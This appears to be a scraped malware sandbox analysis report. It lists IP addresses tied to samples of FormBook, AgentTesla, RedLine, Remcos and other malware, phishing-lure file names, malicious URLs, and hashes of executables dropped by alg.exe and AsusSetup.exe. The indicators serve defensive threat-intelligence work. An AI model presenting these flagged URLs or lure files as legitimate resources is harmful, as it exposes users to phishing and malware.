Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                                                                                                                                  • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  xnxvnn.biznL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  ytctnunms.bizSetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  uaafd.bizSetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 3.254.94.185
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                                                                                                                                  • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                  PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                  PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                  nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                  tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                  RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                  AMAZON-02UShttp://bigfoot99.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 54.247.166.172
                                                                                                                                                                                                                                                                                                                                                                                                                  SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 18.244.18.38
                                                                                                                                                                                                                                                                                                                                                                                                                  https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7O
VeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 18.245.31.89
                                                                                                                                                                                                                                                                                                                                                                                                                  https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                                                  rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 52.60.87.163
                                                                                                                                                                                                                                                                                                                                                                                                                  https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                                                  https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                  • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                                                                                                                                                                                  No context
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1508864
Entropy (8bit): 4.879313658335004
Encrypted: false
SSDEEP: 24576:szCAR0ic/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sCAYLNiXicJFFRGNzj3
MD5: EFB1502CF1CAC9DD47758133205A1D6D
SHA1: DC89846E3FAC9A922F5A659188BE9C2C0812DF46
SHA-256: B3D2A5C6AF475833EF605F3C21ABC10A757AA8BE84110DDF73C5ED555A5F2498
SHA-512: 5DBA0747AB67C0EFB7C6447CD53B2D9EE9822CA6B68C0FA444566A6401773C102FA5019F1487E20B8F7F0E95729DC7FDE1D7B26D8F9F9333C7E35A02A9C8522E
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1450496
Entropy (8bit): 4.821235888243559
Encrypted: false
SSDEEP: 24576:5CbKgB/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ULNiXicJFFRGNzj3
MD5: 3F9408CDCAAF94DEE563BB33AC84537C
SHA1: B3BB9321668D2101810F2BB37BB90522C91E146E
SHA-256: EC1671F3AEB2D508CB7F6F012ACE39D0BC2F550F9A04819602E7E48B48DD9CAA
SHA-512: 4F731E3043CA2DB44E6FA6E772ADB396A2FEC6FD0D8C89C90DF46592E413104E5719EC8FE796FC1BB5F4696E350AEECD10700CD8DE6E2BCEA45595DF9D9E873A
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1469952
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.819280622695143
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:kKdHo/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xdILNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2BAA1B9CBEB6FE4B472878C72334A920
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:70EE144677FC3008C7887C9D89C4F8950CB2B94D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9ACDEC80707A4504E16E4A89CAB2C25BD32A8F9CEEAA52423C189B97D684937C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C2C54C81DD8E6F8D377D31DD848F25132BDE8571691A86AF8D5FEADA45DDC0C02D11C1308A5B46A3A4F2CC97BC6459FCFF90CE02EDF792D69ABC4C3E908E3E99
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.644273634751725
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:WK0eqkSR7Xgo4TiRPnLWvJALNiXicJFFRGNzj3:WK0pR7Xn4TiRCvJA7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:4724B2E5C75F0892491949209A88AAC8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:D2A90C77FA10E7AD1CA1D1D696A5B21E23E44596
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F4481C875E51C648D42533E6E7BA471E7F484399D618DE45D624D55E437D6D3E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:A1C63E1B000B427646CEEB0E31B363E575A9A429E3BAA646CCC8C8822D782CD3B5C7272AF13E92B4FDA9C12843DC927FB179B45B67AB497BE179333B311CCDFC
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.562603341825506
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:JfYP1JsEDkSR7Xgo4TiRPnLWvJALNiXicJFFRGNzj3:5YPBR7Xn4TiRCvJA7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:079BAA2941330ABB4CCAA54C4D5A6043
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:FC3386ADA629811074A731954359CD13FF8E757B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:06AE397338BFA1A291C2A0F802C46976B008E570CBADC0A4E5B42AB65CECA536
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4D7F9B7C8360779BF7328182D9E816FD06E2CE0D00BF93F660E87DDD52B7998897B65B6AE27D5E8227D87BA58C76ED4C338FC1619D3087C66A0FBB933617A087
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1400832
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6565601801305325
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:mYUckn6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mZckn6LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2DB099C6A110E8CD79A2BC7F46259429
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:FEC4FA1D73A71D643D122E6847DA93D95180475E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:E5CA2FDD83840051B29730504660D085D3B30D75B831D1344D7CF76194F6C4D9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C87C400122D76811E85AA85226B59A87FECC7B454E64443F37439E9BB815BD1312C3F73BA05632B1FEC0F97D0164A1113DE1CBCE79A760C422704AA52E986C42
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.161593077257909
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:7+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS0LNiXicJFFRGNzj3:ZSktbp67wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:64BB6B79282579232C646625DAD60F8C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:476B51803D456BB6862A7830FF8F1947EB451BBB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9E292C65058D419274C39EA3E15607A441E6ED88EA4BB4B50575F960EB121E4C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:98A3F09E474A88AB1AC21979E9D0AD49D7F531AADC730081A42DA9E17A9295C0CF6C71427EBC7493C7648B99B7A24C904035FD4CB858BC867EDE50CC3A600406
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.091294047810581
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:JGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLjLNiXicJFFRGNzj3:d4OEtwiICvYMRfD7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:BF1B290FCE99CD25FA653BAFBA0510A3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:BFAA8CA06902A0AC197956F3D4BCD93DAF6FDE51
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7DC6ED68D93F9EC925701CC4663634DE6A2AC4DB6E91FD87177EAAC5EB8A26E3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:76B94B2B5F36BC8E35FB654E530243CCD7F0497F89DAFD881011EA83BB7AB2713EA38B26F8699399CE70192DC4E362321547FC6C1D87E8DFF02C98DEFBEBB3A4
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1641472
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0793566651380155
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:gAMJR+3kMbVjhs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:hi+lbVjhsLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:8DE05C7A59091AB8240A6DC246620747
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:ACA54533563F3CF9C2D6BABCB1010FE4BE6C1DA5
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:CFAAB396943383F31A22FEBBE333CF90E7F8BF132B3DA6C3C038236205147EA7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:D0BD792BDB497F3256B0CAC1E8807CEAA0C8DB6CC21CF7E9104EE5981BB78852D4615786FDBB8DCCCB938B653F22C15FA74932FF1E2C792D5AF78238DC52134A
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1445888
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815247094760056
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:7xGBcmlY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:1Gy+YLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:828741995F05BE2FD6B071628F96F6B9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:7F21CCC1B2A924233B45A9D604E34EA233ECB037
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:166C97DA0D7C996606139D0F32FE0989F7CD7D746EBF73EAC872214670C450C6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:ECBA401716996EC0076EF928A0A5581BFEBE48834FBF992A32A725C20C3D71AE8AC501E2CA80E9ED834B18D76A0E35506B3C88CA88537EE98403EF0B2EC9FCB9
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1800192
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.306024821113753
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:A0vHymLj8trn3wsq/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Blj4rgsqLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E5D374EDFD095DF7A4B1BB8CA8EDEC51
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:FBBB997878A6BFEF7F5F33483B966386A7260BCF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:31B3050433166DC90EDFDA4568AD3E04125FB3B7F020327EC291E34C6E34B392
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:67B1CAFB282A90B6E9010AF7B40F0C5A406F4001FEF02B0C11077394AD3DB5C959045300FDED43E1642399A796A4BC3B2A2EB4268A409234532CF92F007C4169
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.273995845458764
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:N4i0wGJra0uAUfkVy7/ZTLNiXicJFFRGNzj3:NN0wGJrakUQy17wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:4FA8A73B5D45AC3C4905698DE5BEC59F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:CBD587BCFD22EF8D5FDF12D1B27C0AB4CDECE130
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:B32C632C903FDC55653A1EC1CA1D9AE9E054FB7C0373AFA12FA780227574F4F8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:257CBC674AE54091062F659846597792DBE2E89B56D3F5733583B832381A6740E8758D45E44C227D9E66D6342001E628E6800EC3E637414CDEEE3CD0B14E92C0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Antivirus:
